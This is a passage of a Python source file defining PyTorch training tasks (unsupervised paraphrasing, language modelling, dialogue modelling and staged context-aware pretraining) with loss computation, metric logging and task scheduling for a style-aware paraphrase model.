from metrics import * from mutils import add_if_not_none ######################### ## TASK SPECIFIC TASKS ## ######################### class UnsupervisedTask(TaskTemplate): def __init__(self, model, model_params, load_data=True, debug=False, name_suffix="", dataset_fun=None): super(UnsupervisedTask, self).__init__(model=model, model_params=model_params, load_data=load_data, debug=debug, name="UnsupervisedTask" + name_suffix, dataset_fun=dataset_fun) self.loss_module = self.model.get_loss_module() self.switch_rate = 1.0 self.VAE_loss_scaling = get_param_val(model_params, "VAE_loss_scaling", 1.0) self.cosine_loss_scaling = get_param_val(model_params, "cosine_loss_scaling", 0.0) self.loss_module_UNK = nn.NLLLoss(ignore_index=-1, reduction='none') self.summary_dict = {"loss_rec": list(), "loss_UNK": list(), "loss_VAE": list(), "loss_cosine": list(), "loss_combined": list(), "loss_UNK_precision": list(), "loss_UNK_recall": list(), "acc_UNK": list(), "style_mu": list(), "style_sigma": list(), "UNK_word_dist": list()} def _load_datasets(self): self._get_datasets_from_handler() self.gen_batch = self.val_dataset.get_random_batch(4, toTorch=False, label_lengths=True, noun_mask=True, mask_prob=0.0) self.val_dataset.reset_index() self.id2word = get_id2word_dict() self.generated_before = False def _get_datasets_from_handler(self): raise NotImplementedError def _get_sents_of_batch(self, batch): context_words, context_lengths, template_words, template_lengths, par_2_words, par_2_lengths, template_masks, context_masks, par_2_masks = batch max_fun = np.max if isinstance(template_lengths[DATA_GLOVE], np.ndarray) else torch.max if template_words[DATA_GLOVE] is not None and max_fun(template_lengths[DATA_GLOVE]) > 0: par_1_words = template_words par_1_lengths = template_lengths par_1_masks = template_masks elif context_words[DATA_GLOVE] is not None and max_fun(context_lengths[DATA_GLOVE]) > 0: par_1_words = context_words par_1_lengths = context_lengths par_1_masks = context_masks else: print("[!] 
ERROR: Template and context words are None") sys.exit(1) return par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks def train_step(self, batch_size, loop_dataset=True, iteration=0): assert self.train_dataset is not None, "[!] ERROR: Training dataset not loaded. Please load the dataset beforehand for training." par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks = self._get_sents_of_batch(self.train_dataset.get_batch(batch_size, loop_dataset=loop_dataset, toTorch=True, label_lengths=True, noun_mask=True, mask_prob=0.2)) current_tf_ratio = self._get_tf_ratio(iteration) use_tf = (random() < current_tf_ratio) if par_1_words is not None and par_1_lengths is not None: par_1_res, par_2_res, par_1_embeds, par_2_embeds = self.model((par_1_words, par_1_lengths, par_1_masks[1], par_2_words, par_2_lengths, par_2_masks[1]), teacher_forcing=use_tf, switch_rate=self.switch_rate) par_1_words = par_1_words[DATA_GLOVE] loss_1, loss_UNK_1, loss_VAE_1, acc_1, acc_UNK_1 = self._calculate_loss(par_1_res, par_1_words, par_1_masks[1], par_1_embeds) loss_2, loss_UNK_2, loss_VAE_2, acc_2, acc_UNK_2 = self._calculate_loss(par_2_res, par_2_words, par_2_masks[1], par_2_embeds) loss_UNK_recall_1, loss_UNK_precision_1 = self._calculate_UNK_loss_metrics(par_1_res[1], par_1_res[3], par_1_masks[1]) loss_UNK_recall_2, loss_UNK_precision_2 = self._calculate_UNK_loss_metrics(par_2_res[1], par_2_res[3], par_2_masks[1]) loss = (loss_1 + loss_2) / 2.0 loss_UNK = (loss_UNK_1 + loss_UNK_2) / 2.0 loss_UNK_recall = (loss_UNK_recall_1 + loss_UNK_recall_2) / 2.0 loss_UNK_precision = (loss_UNK_precision_1 + loss_UNK_precision_2) / 2.0 loss_VAE = (loss_VAE_1 + loss_VAE_2) / 2.0 loss_cos = (1 - F.cosine_similarity(par_1_embeds[0], par_2_embeds[0], dim=-1)).mean() acc = (acc_1 + acc_2) / 2.0 acc_UNK = (acc_UNK_1 + acc_UNK_2) / 2.0 else: #FIX RECONSTRUCTION par_res, par_embeds = self.model.reconstruct((par_2_words, par_2_lengths), teacher_forcing=use_tf) loss, loss_UNK, loss_VAE, acc, acc_UNK = self._calculate_loss(par_res, par_2_words, par_2_masks[0], par_embeds) loss_cos = torch.zeros(size=(1,)) loss_UNK_recall, loss_UNK_precision = self._calculate_UNK_loss_metrics(par_res[1], par_res[3], par_2_masks[0]) # (loss_UNK_recall + loss_UNK_precision) / 2.0 final_loss = loss + loss_UNK + loss_UNK_recall + loss_UNK_precision + loss_VAE * self.VAE_loss_scaling + loss_cos * self.cosine_loss_scaling self.summary_dict["loss_rec"].append(loss.item()) self.summary_dict["loss_UNK"].append(loss_UNK.item()) self.summary_dict["loss_UNK_recall"].append(loss_UNK_recall.item()) self.summary_dict["loss_UNK_precision"].append(loss_UNK_precision.item()) self.summary_dict["loss_VAE"].append(loss_VAE.item()) self.summary_dict["loss_cosine"].append(loss_cos.item()) self.summary_dict["acc_UNK"].append(acc_UNK.item()) self.summary_dict["loss_combined"].append(final_loss.item()) for dict_key, hist_tensors in zip(["UNK_word_dist", "style_mu", "style_sigma"], [[par_1_res[1][:,:,0], par_2_res[1][:,:,0]], [par_1_embeds[1], par_2_embeds[1]], [par_1_embeds[2], par_2_embeds[2]]]): new_vals = [t.detach().cpu().contiguous().view(-1).numpy().tolist() for t in hist_tensors] new_vals = [e for sublist in new_vals for e in sublist] self.summary_dict[dict_key].append(new_vals) while len(self.summary_dict[dict_key]) > 10: del self.summary_dict[dict_key][0] return final_loss, acc def _calculate_loss(self, par_res, batch_labels, par_masks, par_embeds): par_word_dist, UNK_word_dist, _, _ = par_res par_masks = 
par_masks[:,1:].contiguous() # First token is SOS # Remove unknown word labels from the loss if (batch_labels[:,0] == get_SOS_index()).byte().all(): batch_labels = batch_labels[:,1:] unknown_label = (batch_labels == get_UNK_index()).long() batch_labels = batch_labels * (1 - unknown_label) + (-1) * unknown_label ## Loss reconstruction loss = self.loss_module(par_word_dist.view(-1, par_word_dist.shape[-1]), batch_labels.view(-1)) UNK_word_dist = torch.log(UNK_word_dist + (UNK_word_dist == 0).float()) loss_UNK = self.loss_module_UNK(UNK_word_dist.view(-1, UNK_word_dist.shape[-1]), par_masks.view(-1)) loss_UNK[torch.isnan(loss_UNK)] = 0 loss_UNK = loss_UNK * (par_masks.view(-1) >= 0).float() loss_UNK = (1 + (par_masks.view(-1) > 0).float()*5.0) * loss_UNK loss_UNK = loss_UNK.sum() / (par_masks >= 0).float().sum() ## Accuracy calculation _, pred_labels = torch.max(par_word_dist, dim=-1) acc = torch.sum(pred_labels == batch_labels).float() / torch.sum(batch_labels != -1).float() _, pred_UNK = torch.max(UNK_word_dist, dim=-1) acc_UNK = torch.sum((pred_UNK == par_masks) & (pred_UNK > 0)).float() / (torch.sum(par_masks > 0).float() + 1e-10) ## Loss VAE regularization semantic_embed, style_mu, style_std = par_embeds loss_VAE = torch.mean(- torch.log(style_std) + (style_std ** 2 - 1 + style_mu ** 2) / 2) return loss, loss_UNK, loss_VAE, acc, acc_UNK def _calculate_UNK_loss_metrics(self, UNK_word_dist, par_lengths, par_masks): par_masks = par_masks[:,1:].contiguous() # First token is SOS par_masks_recall = torch.max(par_masks - 1, par_masks.new_zeros(size=par_masks.shape)-1) UNK_word_dist_recall = UNK_word_dist[:,:,1:].contiguous() loss_UNK_recall = self.loss_module_UNK(UNK_word_dist_recall.view(-1, UNK_word_dist_recall.shape[-1]), par_masks_recall.view(-1)) # print("Par masks: %s" % str(par_masks_recall[:,:4])) # print("UNK word dist recall: %s" % str(UNK_word_dist_recall[:,:4,:])) # print("Loss UNK recall: %s" % str(loss_UNK_recall)) UNK_labels_one_hot = UNK_word_dist.new_zeros(size=UNK_word_dist.shape) UNK_labels_one_hot = UNK_labels_one_hot.scatter(2, (par_masks + (par_masks == -1).long())[:,:,None], 1) UNK_labels_one_hot = UNK_labels_one_hot[:,:,1:] valid_UNKs = (UNK_labels_one_hot.sum(dim=1) > 0.0).float() loss_UNK_recall_manual = - torch.log(UNK_word_dist_recall * UNK_labels_one_hot + (1 - UNK_labels_one_hot)).sum() / UNK_labels_one_hot.sum() # print("Loss UNK recall manual: %s" % str(loss_UNK_recall_manual)) PREC_THRESHOLD = 0.1 UNK_precision_sum = (torch.max(torch.zeros_like(UNK_word_dist_recall)+PREC_THRESHOLD, UNK_word_dist_recall * (1 - UNK_labels_one_hot)) - PREC_THRESHOLD).sum(dim=1) / par_lengths.float().view(-1, 1) loss_UNK_precision = - torch.log(1 / (1 + UNK_precision_sum)).sum() / valid_UNKs.sum() return loss_UNK_recall_manual, loss_UNK_precision def _eval_batch(self, batch): par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks = self._get_sents_of_batch(batch) eval_swr = (1.0 if self.switch_rate > 0.0 else 0.0) p1_res, p2_res, _, _ = self.model((par_1_words, par_1_lengths, par_1_masks[int(eval_swr)], par_2_words, par_2_lengths, par_2_masks[int(eval_swr)]), teacher_forcing=True, switch_rate=eval_swr) p1_perplexity_probs, _, _, _ = p1_res p2_perplexity_probs, _, _, _ = p2_res p1_res_tf, p2_res_tf, _, _ = self.model((par_1_words, par_1_lengths, par_1_masks[int(eval_swr)], par_2_words, par_2_lengths, par_2_masks[int(eval_swr)]), teacher_forcing=False, switch_rate=eval_swr) _, _, p1_generated_words, p1_generated_lengths = p1_res_tf _, _, p2_generated_words, 
p2_generated_lengths = p2_res_tf p1_perplexity_probs = p1_perplexity_probs.detach() p1_generated_words = p1_generated_words.detach() p1_generated_lengths = p1_generated_lengths.detach() p2_perplexity_probs = p2_perplexity_probs.detach() p2_generated_words = p2_generated_words.detach() p2_generated_lengths = p2_generated_lengths.detach() # Remove unknown word labels from the evaluation batch_labels = par_2_words # [DATA_GLOVE] if (batch_labels[:,0] == get_SOS_index()).byte().all(): batch_labels = batch_labels[:,1:] unknown_label = (batch_labels == get_UNK_index()).long() batch_labels = batch_labels * (1 - unknown_label) + (-1) * unknown_label return batch_labels, p2_perplexity_probs, p2_generated_words, p2_generated_lengths # batch_labels, perplexity_probs, generated_words, generated_lengths def eval(self, dataset=None, batch_size=64): return super().eval(dataset=dataset, batch_size=batch_size, label_lengths=True, noun_mask=True) def add_summary(self, writer, iteration): # TODO: Add some example generations here. Either run the model again for some random sentences, or save last training sentences writer.add_scalar("train_%s/teacher_forcing_ratio" % (self.name), self._get_tf_ratio(iteration), iteration) for key, val in self.summary_dict.items(): if not isinstance(val, list): writer.add_scalar("train_%s/%s" % (self.name, key), val, iteration) self.summary_dict[key] = 0.0 elif len(val) == 0: continue elif not isinstance(val[0], list): writer.add_scalar("train_%s/%s" % (self.name, key), mean(val), iteration) self.summary_dict[key] = list() else: val = [v for sublist in val for v in sublist] writer.add_histogram("train_%s/%s" % (self.name, key), np.array(val), iteration) self.summary_dict[key] = list() if iteration % 1 == 0: gen_list = self.generate_examples() for i in range(len(gen_list)): if not self.generated_before: writer.add_text(self.name + "_gen%i_input_phrase" % (i), gen_list[i][0], iteration) writer.add_text(self.name + "_gen%i_input_labels" % (i), gen_list[i][1], iteration) writer.add_text(self.name + "_gen%i_reconstructed_phrase" % (i), gen_list[i][2], iteration) writer.add_text(self.name + "_gen%i_reconstructed_phrase_tf" % (i), gen_list[i][3], iteration) gen_list = self.generate_random_style_samples() for i in range(len(gen_list)): if not self.generated_before: writer.add_text(self.name + "_samp%i_input_phrase" % (i), gen_list[i][0], iteration) for j in range(len(gen_list[i][1])): writer.add_text(self.name + "_samp%i_sample_%i" % (i, j), gen_list[i][1][j], iteration) self.generated_before = True @staticmethod def batch_to_torch(batch): new_batch = [] for b in batch: if isinstance(b, dict): new_element = dict() for key in b.keys(): new_element[key] = torch.LongTensor(b[key]).to(get_device()) if b[key] is not None else None elif isinstance(b, list): new_element = [torch.LongTensor(b_e).to(get_device()) for b_e in b] elif isinstance(b, tuple): new_element = tuple([torch.LongTensor(b_e).to(get_device()) for b_e in b]) elif b is None: new_element = None else: new_element = torch.LongTensor(b).to(get_device()) new_batch.append(new_element) return tuple(new_batch) def generate_examples(self): self.model.eval() # 1.) Put data on GPU batch_torch = UnsupervisedTask.batch_to_torch(self.gen_batch) eval_swr = (1.0 if self.switch_rate > 0.0 else 0.0) # 2.) 
Push data through network par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks = self._get_sents_of_batch(batch_torch) # self.train_dataset.get_batch(batch_size, loop_dataset=loop_dataset, toTorch=True, label_lengths=True) with torch.no_grad(): par_1_res, par_2_res, _, _ = self.model((par_1_words, par_1_lengths, par_1_masks[int(eval_swr)], par_2_words, par_2_lengths, par_2_masks[int(eval_swr)]), teacher_forcing=False, switch_rate=eval_swr) par_1_res_tf, par_2_res_tf, _, _ = self.model((par_1_words, par_1_lengths, par_1_masks[int(eval_swr)], par_2_words, par_2_lengths, par_2_masks[int(eval_swr)]), teacher_forcing=True, switch_rate=eval_swr) del batch_torch # 3.) Reconstruct generated answer and input generated_paraphrases = list() generated_paraphrases_tf = list() input_phrases = list() input_labels = list() gen_par_1_UNKdist = par_1_res[1].cpu().numpy() gen_par_1_words = par_1_res[2].cpu().numpy() gen_par_1_lengths = par_1_res[3].cpu().numpy() gen_par_2_UNKdist = par_1_res[1].cpu().numpy() gen_par_2_words = par_2_res[2].cpu().numpy() gen_par_2_lengths = par_2_res[3].cpu().numpy() gen_par_1_words_tf = par_1_res_tf[2].cpu().numpy() gen_par_1_lengths_tf = par_1_res_tf[3].cpu().numpy() gen_par_2_words_tf = par_2_res_tf[2].cpu().numpy() gen_par_2_lengths_tf = par_2_res_tf[3].cpu().numpy() par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks = self._get_sents_of_batch(self.gen_batch) par_1_words, par_1_lengths = par_1_words[DATA_GLOVE], par_1_lengths[DATA_GLOVE] for embeds, lengths, list_to_add, UNK_dist in zip([par_1_words, par_2_words, par_1_words if eval_swr == 0.0 else par_2_words, par_2_words if eval_swr == 0.0 else par_1_words, gen_par_1_words, gen_par_2_words, gen_par_1_words_tf, gen_par_2_words_tf], [par_1_lengths, par_2_lengths, par_1_lengths if eval_swr == 0.0 else par_2_lengths, par_2_lengths if eval_swr == 0.0 else par_1_lengths, gen_par_1_lengths, gen_par_2_lengths, gen_par_1_lengths_tf, gen_par_2_lengths_tf], [input_phrases, input_phrases, input_labels, input_labels, generated_paraphrases, generated_paraphrases, generated_paraphrases_tf, generated_paraphrases_tf], [None, None, None, None, gen_par_1_UNKdist, gen_par_2_UNKdist, None, None]): for batch_index in range(embeds.shape[0]): p_words = list() if len(lengths.shape) == 1: for word_index in range(lengths[batch_index]): p_words.append(self.id2word[embeds[batch_index, word_index]]) # if UNK_dist is not None: # p_words.append("{%i,%3.1f}" % (np.argmax(UNK_dist[batch_index,word_index]), 100.0*UNK_dist[batch_index,word_index,0])) sents = "[%i] " % (lengths[batch_index]) + " ".join(p_words) else: lengths = np.reshape(lengths, [lengths.shape[0], -1]) for sent_index in range(lengths.shape[1]): s_words = ["[%i] " % (lengths[batch_index, sent_index])] for word_index in range(lengths[batch_index, sent_index]): s_words.append(self.id2word[embeds[batch_index, sent_index, word_index]]) # if UNK_dist is not None: # p_words.append("{%i,%3.1f}" % (np.argmax(UNK_dist[batch_index,sent_index,word_index]), 100.0*UNK_dist[batch_index,sent_index,word_index,0])) p_words.append(" ".join(s_words)) sents = p_words list_to_add.append(sents) # 5.) Put everything in a nice format gen_list = list(zip(input_phrases, input_labels, generated_paraphrases, generated_paraphrases_tf)) self.model.train() return gen_list def generate_random_style_samples(self): self.model.eval() # 1.) 
Put data on GPU batch_torch = UnsupervisedTask.batch_to_torch(self.gen_batch) _, _, _, par_words, par_lengths, par_masks = self._get_sents_of_batch(batch_torch) with torch.no_grad(): _, _, gen_par_words, gen_par_lengths = self.model.sample_reconstruction_styles((par_words, par_lengths, par_masks[0]), num_samples=8) del batch_torch # 3.) Reconstruct generated answer and input generated_paraphrases = list() input_phrases = list() gen_par_words = gen_par_words.cpu().numpy() gen_par_lengths = gen_par_lengths.cpu().numpy() par_words = self.gen_batch[4] par_lengths = self.gen_batch[5] for embeds, lengths, list_to_add in zip([par_words, gen_par_words], [par_lengths, gen_par_lengths], [input_phrases, generated_paraphrases]): for batch_index in range(embeds.shape[0]): p_words = list() if len(lengths.shape) == 1: for word_index in range(lengths[batch_index]): p_words.append(self.id2word[embeds[batch_index, word_index]]) sents = "[%i] " % (lengths[batch_index]) + " ".join(p_words) else: lengths = np.reshape(lengths, [lengths.shape[0], -1]) for sent_index in range(lengths.shape[1]): s_words = ["[%i] " % (lengths[batch_index, sent_index])] for word_index in range(lengths[batch_index, sent_index]): s_words.append(self.id2word[embeds[batch_index, sent_index, word_index]]) p_words.append(" ".join(s_words)) sents = p_words list_to_add.append(sents) # 5.) Put everything in a nice format gen_list = list(zip(input_phrases, generated_paraphrases)) self.model.train() return gen_list class LanguageModelingTask(UnsupervisedTask): def __init__(self, model, model_params, load_data=True, debug=False, name_suffix="", switch_rate=0.0, dataset_fun=DatasetHandler.load_LM_Dialogue_datasets): super(LanguageModelingTask, self).__init__(model=model, model_params=model_params, load_data=load_data, debug=debug, dataset_fun=dataset_fun) self.name = "LanguageModeling" + self.train_dataset.dataset_name.replace(" ","_") self.switch_rate = switch_rate self.cosine_loss_scaling = 0.0 def _get_datasets_from_handler(self): self.train_dataset, self.val_dataset, self.test_dataset = self.dataset_fun(debug_dataset=self.debug) class DialogueModelingTask(UnsupervisedTask): def __init__(self, model, model_params, load_data=True, debug=False, name_suffix="", switch_rate=0.5, dataset_fun=DatasetHandler.load_LM_Dialogue_datasets): super(DialogueModelingTask, self).__init__(model=model, model_params=model_params, load_data=load_data, debug=debug, dataset_fun=dataset_fun) self.name = "DialogueModeling" + self.train_dataset.dataset_name.replace(" ","_") self.switch_rate = 0.0 self.binary_switch_rate = 0.5 self.cosine_loss_scaling = 0.0 def _get_datasets_from_handler(self): self.train_dataset, self.val_dataset, self.test_dataset = self.dataset_fun(debug_dataset=self.debug) def train_step(self, batch_size, loop_dataset=True, iteration=0): assert self.train_dataset is not None, "[!] ERROR: Training dataset not loaded. Please load the dataset beforehand for training." 
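        # Note: the remainder of this train_step draws a batch and then, with probability
        # self.binary_switch_rate, trains the question->answer "switch" path via
        # self.model.question_answer_switch; otherwise it reconstructs question and answer
        # separately and mixes their losses with QUEST_FAC = 1/3 and ANSW_FAC = 2/3.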
quest_words, quest_lengths, quest_masks, answ_words, answ_lengths, answ_masks = self._get_sents_of_batch(self.train_dataset.get_batch(batch_size, loop_dataset=loop_dataset, toTorch=True, label_lengths=True, noun_mask=True, mask_prob=0.2)) current_tf_ratio = self._get_tf_ratio(iteration) use_tf = (random() < current_tf_ratio) switch_factor = (random() < self.binary_switch_rate) if switch_factor: answ_res, quest_embeds = self.model.question_answer_switch((quest_words, quest_lengths, quest_masks[0], answ_words, answ_lengths, answ_masks[0]), teacher_forcing=use_tf) loss, loss_UNK, loss_VAE, acc, acc_UNK = self._calculate_loss(answ_res, answ_words, answ_masks[0], quest_embeds) else: quest_res, quest_embeds = self.model.reconstruct((quest_words, quest_lengths, quest_masks[0]), teacher_forcing=use_tf) answ_res, answ_embeds = self.model.reconstruct((answ_words, answ_lengths, answ_masks[0]), teacher_forcing=use_tf) quest_words = quest_words[DATA_GLOVE] loss_quest, loss_UNK_quest, loss_VAE_quest, acc_quest, acc_UNK_quest = self._calculate_loss(quest_res, quest_words, quest_masks[0], quest_embeds) loss_answ, loss_UNK_answ, loss_VAE_answ, acc_answ, acc_UNK_answ = self._calculate_loss(answ_res, answ_words, answ_masks[0], answ_embeds) ANSW_FAC = 2.0 / 3.0 QUEST_FAC = 1 - ANSW_FAC loss = loss_quest * QUEST_FAC + loss_answ * ANSW_FAC loss_VAE = loss_VAE_quest * QUEST_FAC + loss_VAE_answ * ANSW_FAC loss_UNK = loss_UNK_quest * QUEST_FAC + loss_UNK_answ * ANSW_FAC acc = acc_quest * QUEST_FAC + acc_answ * ANSW_FAC acc_UNK = acc_UNK_quest * QUEST_FAC + acc_UNK_answ * ANSW_FAC final_loss = loss + loss_UNK + loss_VAE * self.VAE_loss_scaling self.summary_dict["loss_rec"].append(loss.item()) self.summary_dict["loss_UNK"].append(loss_UNK.item()) self.summary_dict["loss_VAE"].append(loss_VAE.item()) self.summary_dict["acc_UNK"].append(acc_UNK.item()) self.summary_dict["loss_combined"].append(final_loss.item()) for dict_key, hist_tensors in zip(["UNK_word_dist", "style_mu", "style_sigma"], [[answ_res[1][:,:,0]], [quest_embeds[1]], [quest_embeds[2]]]): new_vals = [t.detach().cpu().contiguous().view(-1).numpy().tolist() for t in hist_tensors] new_vals = [e for sublist in new_vals for e in sublist] self.summary_dict[dict_key].append(new_vals) while len(self.summary_dict[dict_key]) > 10: del self.summary_dict[dict_key][0] return final_loss, acc class ParaphraseTask(UnsupervisedTask): def __init__(self, model, model_params, load_data=True, debug=False, name_suffix="", switch_rate=0.8, dataset_fun=DatasetHandler.load_Microsoft_Video_Description_datasets): super(ParaphraseTask, self).__init__(model=model, model_params=model_params, load_data=load_data, debug=debug, dataset_fun=dataset_fun) self.name = "ParaphraseTask" + self.train_dataset.dataset_name.replace(" ","_") self.switch_rate = switch_rate def _get_datasets_from_handler(self): self.train_dataset, self.val_dataset, self.test_dataset = self.dataset_fun(debug_dataset=self.debug) class PretrainingTask(TaskTemplate): def __init__(self, model, model_params, load_data=True, debug=False, name_suffix=""): super(PretrainingTask, self).__init__(model=model, model_params=model_params, load_data=load_data, debug=debug, name="PretrainingTask" + name_suffix) if not debug: self.tasks = [ DialogueModelingTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_LM_Dialogue_datasets), ParaphraseTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_Microsoft_Video_Description_datasets, switch_rate=0.75), 
ParaphraseTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_Quora_Paraphrase_datasets, switch_rate=0.6), ParaphraseTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_Wikipedia_Paraphrase_datasets, switch_rate=0.75) ] self.task_frequency = [ 0.2, 0.1, 0.4, 0.3 ] else: self.tasks = [ ParaphraseTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_Wikipedia_Paraphrase_datasets, switch_rate=0.75) # DialogueModelingTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_LM_Dialogue_datasets) ] self.task_frequency = [ 1.0 ] self._prepare_training() def _prepare_training(self): self.train_index = 0 self.train_permut_order = [] for task_index, p in enumerate(self.task_frequency): self.train_permut_order += [task_index]*int(p * 100) shuffle(self.train_permut_order) def _load_datasets(self): self.train_dataset, self.val_dataset, self.test_dataset = None, None, None def train_step(self, batch_size, loop_dataset=True, iteration=0): task_index = self.train_permut_order[self.train_index] self.train_index += 1 if self.train_index >= len(self.train_permut_order): self.train_index = 0 shuffle(self.train_permut_order) return self.tasks[task_index].train_step(batch_size=batch_size, loop_dataset=loop_dataset, iteration=iteration) def eval(self, dataset=None, batch_size=64): avg_acc = 0 detailed_metrics = {} for t_ind, t in enumerate(self.tasks): acc_t, detailed_t = t.eval(dataset=dataset, batch_size=batch_size) detailed_metrics[t.name] = detailed_t avg_acc += self.task_frequency[t_ind] * acc_t return avg_acc, detailed_metrics def add_summary(self, writer, iteration): for t in self.tasks: t.add_summary(writer, iteration) class ContextAwarePretrainingTask(TaskTemplate): def __init__(self, model, model_params, load_data=True, debug=False, name_suffix=""): super(ContextAwarePretrainingTask, self).__init__(model=model, model_params=model_params, load_data=load_data, debug=debug, name="PretrainingTask" + name_suffix) self.tasks = [ [ ContextAwareParaphrasingTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_Quora_Paraphrase_datasets) ], [ ContextAwareParaphrasingTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_Quora_Paraphrase_datasets), ContextAwareLanguageModelingTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_ContextLM_Book_datasets), ContextAwareDialogueTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_Dialogue_Paraphrase_datasets) ], [ ContextAwareDialogueTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_Dialogue_Paraphrase_datasets), ContextAwareDialogueTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_Dialogue_Paraphrase_Small_datasets, name_suffix="Small") ] ] freq_second_task = get_param_val(model_params, "pretraining_second_task", 0.15) self.task_frequency = [ [ 1.0 ], [ 0.3, # 0.6 0.2, # 0.4 0.5 # 0.0 ], [ 1.0 - freq_second_task, freq_second_task ] ] self.training_iterations = [ 0 if not get_param_val(model_params, "only_paraphrasing", False) else 100000, get_param_val(model_params, "pretraining_iterations", 15000) ] self.training_stage = -1 assert len(self.tasks) == len(self.task_frequency), "[!] ERROR: Both the tasks and the frequency need to be defined for the same number of training stages." 
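        # Note: training is organised in stages. self.tasks[i] and self.task_frequency[i]
        # describe stage i, and self.training_iterations[i] is the global iteration at which
        # stage i is left for stage i+1. _switch_training_stages() (below) rebuilds
        # train_permut_order by repeating each task index int(freq * 100) times and shuffling,
        # so tasks are sampled roughly in proportion to their configured frequencies.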
assert all([len(self.tasks[i]) == len(self.task_frequency[i]) for i in range(len(self.tasks))]), "[!] ERROR: For each training stage, one frequency needs to be defined per task." assert len(self.training_iterations) == len(self.task_frequency) - 1, "[!] ERROR: A duration (number of training iterations) needs to be specified for every training stage except the last one." self._switch_training_stages() def _switch_training_stages(self): self.training_stage += 1 print("-"*75) print("Switch training stage to %i" % (self.training_stage)) print("-"*75) self.train_index = 0 self.train_permut_order = [] for task_index, p in enumerate(self.task_frequency[self.training_stage]): self.train_permut_order += [task_index]*int(p * 100) shuffle(self.train_permut_order) def _load_datasets(self): self.train_dataset, self.val_dataset, self.test_dataset = None, None, None def train_step(self, batch_size, loop_dataset=True, iteration=0): while self.training_stage < len(self.training_iterations) and \ iteration >= self.training_iterations[self.training_stage]: self._switch_training_stages() stage_iteration = iteration - (self.training_iterations[self.training_stage-1] if self.training_stage > 0 else 0) task_index = self.train_permut_order[self.train_index] self.train_index += 1 if self.train_index >= len(self.train_permut_order): self.train_index = 0 shuffle(self.train_permut_order) return self.tasks[self.training_stage][task_index].train_step(batch_size=batch_size, loop_dataset=loop_dataset, iteration=stage_iteration) def eval(self, dataset=None, batch_size=64): avg_acc = 0 detailed_metrics = {} if len(self.tasks[self.training_stage]) > 1: for t_ind, t in enumerate(self.tasks[self.training_stage]): acc_t, detailed_t = t.eval(dataset=dataset, batch_size=batch_size) detailed_metrics[t.name] = detailed_t if self.task_frequency[self.training_stage][t_ind] == max(self.task_frequency[self.training_stage]): avg_acc = acc_t return avg_acc, detailed_metrics else: return self.tasks[self.training_stage][0].eval(dataset=dataset, batch_size=batch_size) def add_summary(self, writer, iteration): for t in self.tasks[self.training_stage]: t.add_summary(writer, iteration) def finalize_summary(self, writer, iteration, checkpoint_path): for train_stage_tasks in self.tasks: for t in train_stage_tasks: t.finalize_summary(writer, iteration, checkpoint_path) def export_best_results(self, checkpoint_path, iteration): for t in self.tasks[self.training_stage]: t.export_best_results(checkpoint_path, iteration) class ContextAwareDialogueTask(TaskTemplate): def __init__(self, model, model_params, load_data=True, debug=False, name_suffix="", dataset_fun=DatasetHandler.load_Dialogue_Paraphrase_datasets): super(ContextAwareDialogueTask, self).__init__(model=model, model_params=model_params, load_data=load_data, debug=debug, name="ContextAwareDialogueParaphrase" + name_suffix, dataset_fun=dataset_fun) self.loss_module = self.model.get_loss_module() self.switch_rate = get_param_val(model_params, "switch_rate", 0.8) self.semantic_full_dropout = get_param_val(model_params, "semantic_full_dropout", 0.0) self.semantic_full_dropout_eval = 0.0 if self.semantic_full_dropout < 1.0 else 1.0 self.KL_scheduler = create_KLScheduler(scheduler_type = get_param_val(model_params, "VAE_scheduler", 1), annealing_func_type = get_param_val(model_params, "VAE_annealing_func", 0), loss_scaling = get_param_val(model_params, "VAE_loss_scaling", 1.0), num_iters = get_param_val(model_params, "VAE_annealing_iters", 10000)) self.cosine_loss_scaling = 
get_param_val(model_params, "cosine_loss_scaling", 0.0) self.cosine_counter_loss = get_param_val(model_params, "cosine_counter_loss", False) self.style_loss_scaling = get_param_val(model_params, "style_loss_scaling", 1.0) self.pure_style_loss = get_param_val(model_params, "pure_style_loss", False) self.use_semantic_specific_attn = get_param_val(model_params, "use_semantic_specific_attn", False) self.loss_module_slots = nn.NLLLoss(ignore_index=-1, reduction='none') self.eval_counter = 0 # self.loss_module_style = LossStyleModule(style_size = get_param_val(model_params, "style_size", allow_default=False, error_location="ContextAwareDialogueTask - model_params"), # response_style_size = get_param_val(model_params, "response_style_size", -1)) # self.loss_module_style = LossStyleSimilarityModule(style_size = get_param_val(model_params, "style_size", allow_default=False, error_location="ContextAwareDialogueTask - model_params")) if get_param_val(model_params, "style_loss_module") == 0: self.loss_module_style = LossStylePrototypeSimilarityModule(style_size = get_param_val(model_params, "response_style_size", allow_default=False, error_location="ContextAwareDialogueTask - model_params"), stop_grads = get_param_val(model_params, "style_loss_stop_grads", False)) else: self.loss_module_style = LossStylePrototypeDistModule(style_size = get_param_val(model_params, "response_style_size", allow_default=False, error_location="ContextAwareDialogueTask - model_params"), stop_grads = get_param_val(model_params, "style_loss_stop_grads", False)) self.style_loss_scheduler = create_KLScheduler(scheduler_type=1, annealing_func_type=1, loss_scaling=self.style_loss_scaling, num_iters=get_param_val(model_params, "style_loss_annealing_iters", -1)) self.summary_dict = {"loss_rec": list(), "loss_slots": list(), "loss_VAE": list(), "loss_style": list(), "KL_scheduler": list(), "style_loss_scheduler": list(), "loss_cosine": list(), "loss_cosine_to_others": list(), "euclidean_dist": list(), "euclidean_dist_to_others": list(), "loss_combined": list(), "acc_slots": 